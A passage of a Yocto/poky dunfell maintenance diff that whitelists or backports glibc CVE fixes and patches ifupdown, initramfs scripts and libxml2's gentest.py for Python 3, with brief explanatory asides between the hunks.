+# Potential patch at https://sourceware.org/bugzilla/show_bug.cgi?id=22853
+CVE_CHECK_WHITELIST += "CVE-2019-1010025"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-35942
+# The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash
+# or read arbitrary memory in parse_param (in posix/wordexp.c) when called with
+# an untrusted, crafted pattern, potentially resulting in a denial of service
+# or disclosure of information. Patch was backported to 2.31 branch already:
+# https://sourceware.org/git/?p=glibc.git;a=commit;h=4f0a61f75385c9a5879cbe7202042e88f692a3c8
+# which is already included in the dunfell branch of poky:
+# https://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?h=dunfell&id=e1e89ff7d75c3d2223f9e3bd875b9b0c5e15836b
+CVE_CHECK_WHITELIST += "CVE-2021-35942"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-4527
+# This vulnerability was introduced in 2.36 by commit
+# f282cdbe7f436c75864e5640a409a10485e9abb2 resolv: Implement no-aaaa stub resolver option
+# so our version (2.31) is not affected
+# See https://sourceware.org/bugzilla/show_bug.cgi?id=30842
+CVE_CHECK_WHITELIST += "CVE-2023-4527"
DEPENDS += "gperf-native bison-native make-native"
@@ -41,6 +74,21 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
file://0027-intl-Emit-no-lines-in-bison-generated-files.patch \
file://0028-inject-file-assembly-directives.patch \
file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \
+ file://CVE-2020-29573.patch \
+ file://CVE-2021-33574_1.patch \
+ file://CVE-2021-33574_2.patch \
+ file://CVE-2021-38604.patch \
+ file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \
+ file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \
+ file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \
+ file://0033-elf-Add-test-case-for-BZ-19329.patch \
+ file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \
+ file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+ file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \
+ file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \
+ file://CVE-2023-0687.patch \
+ file://CVE-2023-4911.patch \
+ file://CVE-2023-4813.patch \
"
S = "${WORKDIR}/git"
B = "${WORKDIR}/build-${TARGET_SYS}"
diff --git a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
index 52986e61c7..d1835c7a10 100644
--- a/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
+++ b/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch
@@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c
return 0;
}
-+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org"
++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org"
/* Print bug-reporting information in the help message. */
static char *
more_help (int key, const char *text, void *input)
diff --git a/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
new file mode 100644
index 0000000000..e374d8ca59
--- /dev/null
+++ b/meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch
@@ -0,0 +1,65 @@
+From e2263b58d7733835355d7b46c3caa96d911a4717 Mon Sep 17 00:00:00 2001
+From: Simon Schwarz <simon.schwarz@infoteam.de>
+Date: Fri, 6 Nov 2020 08:53:20 +0100
+Subject: [PATCH] inet6.defn: Added -1 option to dhclient on upping an
+ interface
+
+This prevents hangs on startup when DHCPv6 is used and no server is available
+
+Upstream-Status: Pending
+
+Signed-off-by: Simon Schwarz <simon.schwarz@infoteam.de>
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ inet6.defn | 12 ++++++------
+ 1 file changed, 6 insertions(+), 6 deletions(-)
+
+diff --git a/inet6.defn b/inet6.defn
+index 73dce24..25022e3 100644
+--- a/inet6.defn
++++ b/inet6.defn
+@@ -29,9 +29,9 @@ method auto
+ if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+ /sbin/ip link set dev %iface% up
+ /lib/ifupdown/wait-for-ll6.sh if (var_true("dhcp", ifd) && execable("/lib/ifupdown/wait-for-ll6.sh"))
+- /sbin/dhclient -6 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -P -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (var_true("dhcp", ifd) && execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+- /sbin/dhclient -6 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -S -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ elsif (var_true("dhcp", ifd) && execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (var_true("dhcp", ifd))
+@@ -154,9 +154,9 @@ method dhcp
+ if (var_set("accept_ra", ifd) && !var_true("accept_ra", ifd))
+ /sbin/ip link set dev %iface% [[address %hwaddress%]] up
+ /lib/ifupdown/wait-for-ll6.sh if (execable("/lib/ifupdown/wait-for-ll6.sh"))
+- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -P -N -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (execable("/sbin/dhclient") && var_true("request_prefix", ifd))
+- /sbin/dhclient -6 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -v -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ elsif (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+@@ -325,7 +325,7 @@ method dhcp
+
+ up
+ /sbin/ifconfig %iface% [[link %hwaddress%]] up
+- /sbin/dhclient -6 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
++ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface%.pid -lf /var/lib/dhcp/dhclient6.%iface%.leases -I -df /var/lib/dhcp/dhclient.%iface%.leases %iface% \
+ if (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+@@ -397,7 +397,7 @@ method dhcp
+ up
+ [[Warning: Option hwaddress: %hwaddress% not yet supported]]
+ inetutils-ifconfig --interface %iface% --up
+- /sbin/dhclient -6 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
++ /sbin/dhclient -6 -1 -pf /run/dhclient6.%iface///.%.pid -lf /var/lib/dhcp/dhclient6.%iface///.%.leases -I -df /var/lib/dhcp/dhclient.%iface///.%.leases %iface% \
+ if (execable("/sbin/dhclient"))
+ echo 'No DHCPv6 client software found!' >&2; false \
+ elsif (1)
+--
+2.17.1
+
diff --git a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
index 53cb971d33..c3681defdc 100644
--- a/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
+++ b/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb
@@ -1,4 +1,5 @@
SUMMARY = "ifupdown: basic ifup and ifdown used by initscripts"
+HOMEPAGE = "https://salsa.debian.org/debian/ifupdown"
DESCRIPTION = "High level tools to configure network interfaces \
This package provides the tools ifup and ifdown which may be used to \
configure (or, respectively, deconfigure) network interfaces, based on \
@@ -6,11 +7,12 @@ the file /etc/network/interfaces."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
-SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \
+SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \
file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \
file://99_network \
file://0001-Define-FNM_EXTMATCH-for-musl.patch \
file://0001-Makefile-do-not-use-dpkg-for-determining-OS-type.patch \
+ file://0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch \
file://run-ptest \
${@bb.utils.contains('DISTRO_FEATURES', 'ptest', 'file://tweak-ptest-script.patch', '', d)} \
"
diff --git a/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
index 4f935be730..035312f4d9 100644
--- a/meta/recipes-core/images/build-appliance-image_15.0.0.bb
+++ b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
@@ -22,9 +22,9 @@ APPEND += "rootfstype=ext4 quiet"
DEPENDS = "zip-native python3-pip-native"
IMAGE_FSTYPES = "wic.vmdk"
-inherit core-image module-base setuptools3
+inherit core-image setuptools3
-SRCREV ?= "5ad59495782e8dbcb2b9d18e27ca4bde131465b4"
+SRCREV ?= "77442211926cbe93d60108f6df4abda3bc06b735"
SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \
file://Yocto_Build_Appliance.vmx \
file://Yocto_Build_Appliance.vmxf \
@@ -61,12 +61,6 @@ fakeroot do_populate_poky_src () {
# Place the README_VirtualBox_Toaster file in builders home folder.
cp ${WORKDIR}/README_VirtualBox_Toaster.txt ${IMAGE_ROOTFS}/home/builder/
- # Create a symlink, needed for out-of-tree kernel modules build
- if [ ! -e ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build ]; then
- rm -f ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
- lnr ${IMAGE_ROOTFS}${KERNEL_SRC_PATH} ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
- fi
-
echo "INHERIT += \"rm_work\"" >> ${IMAGE_ROOTFS}/home/builder/poky/build/conf/auto.conf
echo "export LC_ALL=en_US.utf8" >> ${IMAGE_ROOTFS}/home/builder/.bashrc
diff --git a/meta/recipes-core/initrdscripts/files/init-install-efi.sh b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
index b6855b5aac..f667518b89 100644
--- a/meta/recipes-core/initrdscripts/files/init-install-efi.sh
+++ b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
@@ -279,6 +279,11 @@ fi
umount /tgt_root
+# copy any extra files needed for ESP
+if [ -d /run/media/$1/esp ]; then
+ cp -r /run/media/$1/esp/* /boot
+fi
+
# Copy kernel artifacts. To add more artifacts just add to types
# For now just support kernel types already being used by something in OE-core
for types in bzImage zImage vmlinux vmlinuz fitImage; do
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/finish b/meta/recipes-core/initrdscripts/initramfs-framework/finish
index 717383ebac..dee3ab3387 100755
--- a/meta/recipes-core/initrdscripts/initramfs-framework/finish
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/finish
@@ -14,6 +14,15 @@ finish_run() {
info "Switching root to '$ROOTFS_DIR'..."
+ debug "Moving basic mounts onto rootfs"
+ for dir in `awk '/\/dev.* \/run\/media/{print $2}' /proc/mounts`; do
+ # Parse any OCT or HEX encoded chars such as spaces
+ # in the mount points to actual ASCII chars
+ dir=`printf $dir`
+ mkdir -p "${ROOTFS_DIR}/media/${dir##*/}"
+ mount -n --move "$dir" "${ROOTFS_DIR}/media/${dir##*/}"
+ done
+
debug "Moving /dev, /proc and /sys onto rootfs..."
mount --move /dev $ROOTFS_DIR/dev
mount --move /proc $ROOTFS_DIR/proc
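The printf in the loop added above is needed because /proc/mounts escapes special characters in mount points as octal sequences (a space appears as \040, a tab as \011). A small Python sketch of the same decoding, purely illustrative and not part of the initramfs scripts:

def decode_mount_point(raw):
    # Expand the octal escapes used by /proc/mounts back into the real
    # characters of the mount point path.
    return raw.encode("ascii").decode("unicode_escape")

print(decode_mount_point(r"/run/media/sda1\040backup"))  # /run/media/sda1 backup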
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
index 748c9391c0..1d8a0ae66d 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
@@ -67,8 +67,8 @@ rootfs_run() {
# It is unlikely to change, but keep trying anyway.
# Perhaps we pick a different device next time.
umount $ROOTFS_DIR
- fi
fi
+ fi
fi
debug "Sleeping for $delay second(s) to wait root to settle..."
sleep $delay
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
index 4c79f41285..7e92f93322 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
@@ -1,4 +1,4 @@
-#/bin/sh
+#!/bin/sh
# Copyright (C) 2011 O.S. Systems Software LTDA.
# Licensed on MIT
diff --git a/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh b/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
index 02f0351fcb..a63e71b780 100755
--- a/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
+++ b/meta/recipes-core/initscripts/initscripts-1.0/checkroot.sh
@@ -74,7 +74,7 @@ test "$VERBOSE" != no && echo "Activating swap"
#
# Check the root filesystem.
#
-if test -f /fastboot || test $rootcheck = no
+if test -f /fastboot || test "$rootcheck" = "no"
then
test $rootcheck = yes && echo "Fast boot, no filesystem check"
else
diff --git a/meta/recipes-core/initscripts/initscripts_1.0.bb b/meta/recipes-core/initscripts/initscripts_1.0.bb
index f98e42eb2e..cb5417cc39 100644
--- a/meta/recipes-core/initscripts/initscripts_1.0.bb
+++ b/meta/recipes-core/initscripts/initscripts_1.0.bb
@@ -129,7 +129,7 @@ do_install () {
update-rc.d -r ${D} rmnologin.sh start 99 2 3 4 5 .
update-rc.d -r ${D} sendsigs start 20 0 6 .
update-rc.d -r ${D} urandom start 38 S 0 6 .
- update-rc.d -r ${D} umountnfs.sh start 31 0 1 6 .
+ update-rc.d -r ${D} umountnfs.sh stop 31 0 1 6 .
update-rc.d -r ${D} umountfs start 40 0 6 .
update-rc.d -r ${D} reboot start 90 6 .
update-rc.d -r ${D} halt start 90 0 .
diff --git a/meta/recipes-core/kbd/kbd_2.2.0.bb b/meta/recipes-core/kbd/kbd_2.2.0.bb
index e5700ff57f..d10c93dfb7 100644
--- a/meta/recipes-core/kbd/kbd_2.2.0.bb
+++ b/meta/recipes-core/kbd/kbd_2.2.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Keytable files and keyboard utilities"
HOMEPAGE = "http://www.kbd-project.org/"
+DESCRIPTION = "The kbd project contains tools for managing Linux console (Linux console, virtual terminals, keyboard, etc.) – mainly, what they do is loading console fonts and keyboard maps."
# everything minus console-fonts is GPLv2+
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=892f569a555ba9c07a568a7c0c4fa63a"
diff --git a/meta/recipes-core/libxcrypt/libxcrypt.inc b/meta/recipes-core/libxcrypt/libxcrypt.inc
index 2d2a0b03e3..b6bf48ba79 100644
--- a/meta/recipes-core/libxcrypt/libxcrypt.inc
+++ b/meta/recipes-core/libxcrypt/libxcrypt.inc
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \
inherit autotools pkgconfig
-SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https"
SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c"
SRCBRANCH ?= "develop"
diff --git a/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
new file mode 100644
index 0000000000..b0d26d1c08
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
@@ -0,0 +1,813 @@
+From b5125000917810731bc28055c0445d571121f80e Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 21 Apr 2022 00:45:58 +0200
+Subject: [PATCH] Port gentest.py to Python 3
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/343fc1421cdae097fa6c4cffeb1a065a40be6bbb]
+
+* fixes:
+
+make[1]: 'testReader' is up to date.
+ File "../libxml2-2.9.10/gentest.py", line 11
+ print "libxml2 python bindings not available, skipping testapi.c generation"
+ ^
+SyntaxError: Missing parentheses in call to 'print'. Did you mean print("libxml2 python bindings not available, skipping testapi.c generation")?
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+make[1]: 'testReader' is up to date.
+ File "../libxml2-2.9.10/gentest.py", line 271
+ return 1
+ ^
+TabError: inconsistent use of tabs and spaces in indentation
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+aarch64-oe-linux-gcc: error: testapi.c: No such file or directory
+aarch64-oe-linux-gcc: fatal error: no input files
+compilation terminated.
+make[1]: *** [Makefile:1275: testapi.o] Error 1
+
+But there is still a bit of a mystery as to why it worked before, because check-am
+calls gentest.py with $(PYTHON), so it ignores the shebang in the script
+and libxml2 is using python3native (through python3targetconfig.bbclass)
+so something like:
+
+libxml2/2.9.10-r0/recipe-sysroot-native/usr/bin/python3-native/python3 gentest.py
+
+But that still fails (now without SyntaxError) with:
+libxml2 python bindings not available, skipping testapi.c generation
+
+because we don't have a dependency on libxml2-native (to provide the libxml2
+python bindings from python3native) and the exported PYTHON_SITE_PACKAGES
+might be useless (e.g. /usr/lib/python3.8/site-packages on Ubuntu-22.10
+which uses python 3.10 and there is no site-packages with libxml2)
+
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ gentest.py | 421 ++++++++++++++++++++++++++---------------------------
+ 1 file changed, 209 insertions(+), 212 deletions(-)
+
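The hunks below are dominated by mechanical Python 2 to Python 3 conversions; a tiny runnable summary of the patterns involved (not part of the patch, the sample values are arbitrary):

import itertools

s = "libxml2"
d = {"parser": 1}

# Python 2: string.find(s, "xml") != -1   ->  Python 3: use the str method.
assert s.find("xml") != -1

# Python 2: d.has_key("parser")           ->  Python 3: membership test.
assert "parser" in d

# Python 2: range() returned lists, so range(a) + range(b) concatenated;
# Python 3 ranges are lazy, so the patch unpacks them instead
# (itertools.chain works as well).
combined = [*range(3), *range(5, 7)]
assert combined == list(itertools.chain(range(3), range(5, 7)))

# Python 2: print "done"                  ->  Python 3: print() is a function.
print("done")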
+diff --git a/gentest.py b/gentest.py
+index b763300..0756706 100755
+--- a/gentest.py
++++ b/gentest.py
+@@ -8,7 +8,7 @@ import string
+ try:
+ import libxml2
+ except:
+- print "libxml2 python bindings not available, skipping testapi.c generation"
++ print("libxml2 python bindings not available, skipping testapi.c generation")
+ sys.exit(0)
+
+ if len(sys.argv) > 1:
+@@ -227,7 +227,7 @@ extra_post_call = {
+ if (old != NULL) {
+ xmlUnlinkNode(old);
+ xmlFreeNode(old) ; old = NULL ; }
+- ret_val = NULL;""",
++\t ret_val = NULL;""",
+ "xmlTextMerge":
+ """if ((first != NULL) && (first->type != XML_TEXT_NODE)) {
+ xmlUnlinkNode(second);
+@@ -236,7 +236,7 @@ extra_post_call = {
+ """if ((ret_val != NULL) && (ret_val != ncname) &&
+ (ret_val != prefix) && (ret_val != memory))
+ xmlFree(ret_val);
+- ret_val = NULL;""",
++\t ret_val = NULL;""",
+ "xmlNewDocElementContent":
+ """xmlFreeDocElementContent(doc, ret_val); ret_val = NULL;""",
+ "xmlDictReference": "xmlDictFree(dict);",
+@@ -268,29 +268,29 @@ modules = []
+ def is_skipped_module(name):
+ for mod in skipped_modules:
+ if mod == name:
+- return 1
++ return 1
+ return 0
+
+ def is_skipped_function(name):
+ for fun in skipped_functions:
+ if fun == name:
+- return 1
++ return 1
+ # Do not test destructors
+- if string.find(name, 'Free') != -1:
++ if name.find('Free') != -1:
+ return 1
+ return 0
+
+ def is_skipped_memcheck(name):
+ for fun in skipped_memcheck:
+ if fun == name:
+- return 1
++ return 1
+ return 0
+
+ missing_types = {}
+ def add_missing_type(name, func):
+ try:
+ list = missing_types[name]
+- list.append(func)
++ list.append(func)
+ except:
+ missing_types[name] = [func]
+
+@@ -310,7 +310,7 @@ def add_missing_functions(name, module):
+ missing_functions_nr = missing_functions_nr + 1
+ try:
+ list = missing_functions[module]
+- list.append(name)
++ list.append(name)
+ except:
+ missing_functions[module] = [name]
+
+@@ -319,45 +319,45 @@ def add_missing_functions(name, module):
+ #
+
+ def type_convert(str, name, info, module, function, pos):
+-# res = string.replace(str, " ", " ")
+-# res = string.replace(str, " ", " ")
+-# res = string.replace(str, " ", " ")
+- res = string.replace(str, " *", "_ptr")
+-# res = string.replace(str, "*", "_ptr")
+- res = string.replace(res, " ", "_")
++# res = str.replace(" ", " ")
++# res = str.replace(" ", " ")
++# res = str.replace(" ", " ")
++ res = str.replace(" *", "_ptr")
++# res = str.replace("*", "_ptr")
++ res = res.replace(" ", "_")
+ if res == 'const_char_ptr':
+- if string.find(name, "file") != -1 or \
+- string.find(name, "uri") != -1 or \
+- string.find(name, "URI") != -1 or \
+- string.find(info, "filename") != -1 or \
+- string.find(info, "URI") != -1 or \
+- string.find(info, "URL") != -1:
+- if string.find(function, "Save") != -1 or \
+- string.find(function, "Create") != -1 or \
+- string.find(function, "Write") != -1 or \
+- string.find(function, "Fetch") != -1:
+- return('fileoutput')
+- return('filepath')
++ if name.find("file") != -1 or \
++ name.find("uri") != -1 or \
++ name.find("URI") != -1 or \
++ info.find("filename") != -1 or \
++ info.find("URI") != -1 or \
++ info.find("URL") != -1:
++ if function.find("Save") != -1 or \
++ function.find("Create") != -1 or \
++ function.find("Write") != -1 or \
++ function.find("Fetch") != -1:
++ return('fileoutput')
++ return('filepath')
+ if res == 'void_ptr':
+ if module == 'nanoftp' and name == 'ctx':
+- return('xmlNanoFTPCtxtPtr')
++ return('xmlNanoFTPCtxtPtr')
+ if function == 'xmlNanoFTPNewCtxt' or \
+- function == 'xmlNanoFTPConnectTo' or \
+- function == 'xmlNanoFTPOpen':
+- return('xmlNanoFTPCtxtPtr')
++ function == 'xmlNanoFTPConnectTo' or \
++ function == 'xmlNanoFTPOpen':
++ return('xmlNanoFTPCtxtPtr')
+ if module == 'nanohttp' and name == 'ctx':
+- return('xmlNanoHTTPCtxtPtr')
+- if function == 'xmlNanoHTTPMethod' or \
+- function == 'xmlNanoHTTPMethodRedir' or \
+- function == 'xmlNanoHTTPOpen' or \
+- function == 'xmlNanoHTTPOpenRedir':
+- return('xmlNanoHTTPCtxtPtr');
++ return('xmlNanoHTTPCtxtPtr')
++ if function == 'xmlNanoHTTPMethod' or \
++ function == 'xmlNanoHTTPMethodRedir' or \
++ function == 'xmlNanoHTTPOpen' or \
++ function == 'xmlNanoHTTPOpenRedir':
++ return('xmlNanoHTTPCtxtPtr');
+ if function == 'xmlIOHTTPOpen':
+- return('xmlNanoHTTPCtxtPtr')
+- if string.find(name, "data") != -1:
+- return('userdata')
+- if string.find(name, "user") != -1:
+- return('userdata')
++ return('xmlNanoHTTPCtxtPtr')
++ if name.find("data") != -1:
++ return('userdata')
++ if name.find("user") != -1:
++ return('userdata')
+ if res == 'xmlDoc_ptr':
+ res = 'xmlDocPtr'
+ if res == 'xmlNode_ptr':
+@@ -366,18 +366,18 @@ def type_convert(str, name, info, module, function, pos):
+ res = 'xmlDictPtr'
+ if res == 'xmlNodePtr' and pos != 0:
+ if (function == 'xmlAddChild' and pos == 2) or \
+- (function == 'xmlAddChildList' and pos == 2) or \
++ (function == 'xmlAddChildList' and pos == 2) or \
+ (function == 'xmlAddNextSibling' and pos == 2) or \
+ (function == 'xmlAddSibling' and pos == 2) or \
+ (function == 'xmlDocSetRootElement' and pos == 2) or \
+ (function == 'xmlReplaceNode' and pos == 2) or \
+ (function == 'xmlTextMerge') or \
+- (function == 'xmlAddPrevSibling' and pos == 2):
+- return('xmlNodePtr_in');
++ (function == 'xmlAddPrevSibling' and pos == 2):
++ return('xmlNodePtr_in');
+ if res == 'const xmlBufferPtr':
+ res = 'xmlBufferPtr'
+ if res == 'xmlChar_ptr' and name == 'name' and \
+- string.find(function, "EatName") != -1:
++ function.find("EatName") != -1:
+ return('eaten_name')
+ if res == 'void_ptr*':
+ res = 'void_ptr_ptr'
+@@ -393,7 +393,7 @@ def type_convert(str, name, info, module, function, pos):
+ res = 'debug_FILE_ptr';
+ if res == 'int' and name == 'options':
+ if module == 'parser' or module == 'xmlreader':
+- res = 'parseroptions'
++ res = 'parseroptions'
+
+ return res
+
+@@ -402,28 +402,28 @@ known_param_types = []
+ def is_known_param_type(name):
+ for type in known_param_types:
+ if type == name:
+- return 1
++ return 1
+ return name[-3:] == 'Ptr' or name[-4:] == '_ptr'
+
+ def generate_param_type(name, rtype):
+ global test
+ for type in known_param_types:
+ if type == name:
+- return
++ return
+ for type in generated_param_types:
+ if type == name:
+- return
++ return
+
+ if name[-3:] == 'Ptr' or name[-4:] == '_ptr':
+ if rtype[0:6] == 'const ':
+- crtype = rtype[6:]
+- else:
+- crtype = rtype
++ crtype = rtype[6:]
++ else:
++ crtype = rtype
+
+ define = 0
+- if modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
++ if module in modules_defines:
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
+ test.write("""
+ #define gen_nb_%s 1
+ static %s gen_%s(int no ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+@@ -433,7 +433,7 @@ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTR
+ }
+ """ % (name, crtype, name, name, rtype))
+ if define == 1:
+- test.write("#endif\n\n")
++ test.write("#endif\n\n")
+ add_generated_param_type(name)
+
+ #
+@@ -445,7 +445,7 @@ known_return_types = []
+ def is_known_return_type(name):
+ for type in known_return_types:
+ if type == name:
+- return 1
++ return 1
+ return 0
+
+ #
+@@ -471,7 +471,7 @@ def compare_and_save():
+ try:
+ os.system("rm testapi.c; mv testapi.c.new testapi.c")
+ except:
+- os.system("mv testapi.c.new testapi.c")
++ os.system("mv testapi.c.new testapi.c")
+ print("Updated testapi.c")
+ else:
+ print("Generated testapi.c is identical")
+@@ -481,17 +481,17 @@ while line != "":
+ if line == "/* CUT HERE: everything below that line is generated */\n":
+ break;
+ if line[0:15] == "#define gen_nb_":
+- type = string.split(line[15:])[0]
+- known_param_types.append(type)
++ type = line[15:].split()[0]
++ known_param_types.append(type)
+ if line[0:19] == "static void desret_":
+- type = string.split(line[19:], '(')[0]
+- known_return_types.append(type)
++ type = line[19:].split('(')[0]
++ known_return_types.append(type)
+ test.write(line)
+ line = input.readline()
+ input.close()
+
+ if line == "":
+- print "Could not find the CUT marker in testapi.c skipping generation"
++ print("Could not find the CUT marker in testapi.c skipping generation")
+ test.close()
+ sys.exit(0)
+
+@@ -505,7 +505,7 @@ test.write("/* CUT HERE: everything below that line is generated */\n")
+ #
+ doc = libxml2.readFile(srcPref + 'doc/libxml2-api.xml', None, 0)
+ if doc == None:
+- print "Failed to load doc/libxml2-api.xml"
++ print("Failed to load doc/libxml2-api.xml")
+ sys.exit(1)
+ ctxt = doc.xpathNewContext()
+
+@@ -519,9 +519,9 @@ for arg in args:
+ mod = arg.xpathEval('string(../@file)')
+ func = arg.xpathEval('string(../@name)')
+ if (mod not in skipped_modules) and (func not in skipped_functions):
+- type = arg.xpathEval('string(@type)')
+- if not argtypes.has_key(type):
+- argtypes[type] = func
++ type = arg.xpathEval('string(@type)')
++ if type not in argtypes:
++ argtypes[type] = func
+
+ # similarly for return types
+ rettypes = {}
+@@ -531,8 +531,8 @@ for ret in rets:
+ func = ret.xpathEval('string(../@name)')
+ if (mod not in skipped_modules) and (func not in skipped_functions):
+ type = ret.xpathEval('string(@type)')
+- if not rettypes.has_key(type):
+- rettypes[type] = func
++ if type not in rettypes:
++ rettypes[type] = func
+
+ #
+ # Generate constructors and return type handling for all enums
+@@ -549,49 +549,49 @@ for enum in enums:
+ continue;
+ define = 0
+
+- if argtypes.has_key(name) and is_known_param_type(name) == 0:
+- values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
+- i = 0
+- vals = []
+- for value in values:
+- vname = value.xpathEval('string(@name)')
+- if vname == None:
+- continue;
+- i = i + 1
+- if i >= 5:
+- break;
